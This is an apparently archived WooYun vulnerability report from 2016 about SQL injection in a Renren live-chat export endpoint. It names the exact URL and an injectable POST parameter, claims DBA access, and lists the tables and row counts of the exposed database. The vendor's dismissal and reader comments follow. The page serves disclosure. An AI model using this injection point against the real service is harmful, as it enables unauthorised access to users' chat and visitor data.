人人网某处SQL注入影响大量数据

发表于 2016年06月23日
WooYun漏洞库
更新于 2019年04月08日 22:20:07 下午

漏洞概要

缺陷编号：WooYun-2016-0222273

漏洞标题：人人网某处SQL注入影响大量数据

漏洞详情

披露状态：

2016-06-23: 细节已通知厂商并且等待厂商处理中
2016-06-24: 厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

http://live800.wan.renren.com:80/live800//sta/export/chatOpSta.jsp (POST)export=txt&companyId=1&subStrSql=*

1	http://live800.wan.renren.com:80/live800//sta/export/chatOpSta.jsp (POST)export=txt&companyId=1&subStrSql=*

dba权限

Database: live800_im<br>
+---------------------+---------+<br>
| Table               | Entries |<br>
+---------------------+---------+<br>
| visitor_access      | 15081675 |<br>
| operator_status     | 633129  |<br>
| chat_topic          | 616252  |<br>
| live800_system      | 410676  |<br>
| chat_content        | 289363  |<br>
| chat_sta            | 289308  |<br>
| chat_info           | 285963  |<br>
| leaveword_topic     | 161506  |<br>
| trustful_visitor    | 78942   |<br>
| leaveword           | 74624   |<br>
| contact             | 71702   |<br>
| cookie_contact      | 71702   |<br>
| company_config_data | 69254   |<br>
| lost                | 51034   |<br>
| sync_info           | 23170   |<br>
| op_chat_content     | 7200    |<br>
| daily_flow_capacity | 1329    |<br>
| sys_operate_log     | 1266    |<br>
| faq                 | 115     |<br>
| operator            | 82      |<br>
| privilege           | 82      |<br>
| company_config      | 36      |<br>
| user_defined_button | 18      |<br>
| company_ui_config   | 16      |<br>
| config_template     | 12      |<br>
| user_invite         | 12      |<br>
| company_skill       | 11      |<br>
| ad_column           | 10      |<br>
| routing_action      | 6       |<br>
| chat_config         | 4       |<br>
| leaveword_box       | 3       |<br>
| notify              | 3       |<br>
| routing_condition   | 3       |<br>
| routing_policy      | 3       |<br>
| routing_rule        | 3       |<br>
| canned_url          | 1       |<br>
| company             | 1       |<br>
| company_style       | 1       |<br>
| customization       | 1       |<br>
| fuf                 | 1       |<br>
| ip_prohibit         | 1       |<br>
| operator_account    | 1       |<br>
+---------------------+---------+

Database: live800_im

+---------------------+---------+

| Table | Entries |

+---------------------+---------+

| visitor_access | 15081675 |

| operator_status | 633129 |

| chat_topic | 616252 |

| live800_system | 410676 |

| chat_content | 289363 |

| chat_sta | 289308 |

| chat_info | 285963 |

| leaveword_topic | 161506 |

| trustful_visitor | 78942 |

| leaveword | 74624 |

| contact | 71702 |

| cookie_contact | 71702 |

| company_config_data | 69254 |

| lost | 51034 |

| sync_info | 23170 |

| op_chat_content | 7200 |

| daily_flow_capacity | 1329 |

| sys_operate_log | 1266 |

| faq | 115 |

| operator | 82 |

| privilege | 82 |

| company_config | 36 |

| user_defined_button | 18 |

| company_ui_config | 16 |

| config_template | 12 |

| user_invite | 12 |

| company_skill | 11 |

| ad_column | 10 |

| routing_action | 6 |

| chat_config | 4 |

| leaveword_box | 3 |

| notify | 3 |

| routing_condition | 3 |

| routing_policy | 3 |

| routing_rule | 3 |

| canned_url | 1 |

| company | 1 |

| company_style | 1 |

| customization | 1 |

| fuf | 1 |

| ip_prohibit | 1 |

| operator_account | 1 |

+---------------------+---------+

漏洞证明：

修复方案：

改改改

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-06-2412:19

厂商回复：

忽略

评价

2010-01-01 00:00 大师兄白帽子 | Rank:0 漏洞数:0)

又有新裤子出来了。。
2010-01-01 00:00 _Thorns 白帽子 | Rank:796 漏洞数:60)

......跟我的重复了
2010-01-01 00:00 寒白帽子 | Rank:0 漏洞数:0)

.

原文连接：人人网某处SQL注入影响大量数据 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。

人人网某处SQL注入影响大量数据

漏洞概要

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

漏洞回应

厂商回应：

厂商回复：

最新状态：

评价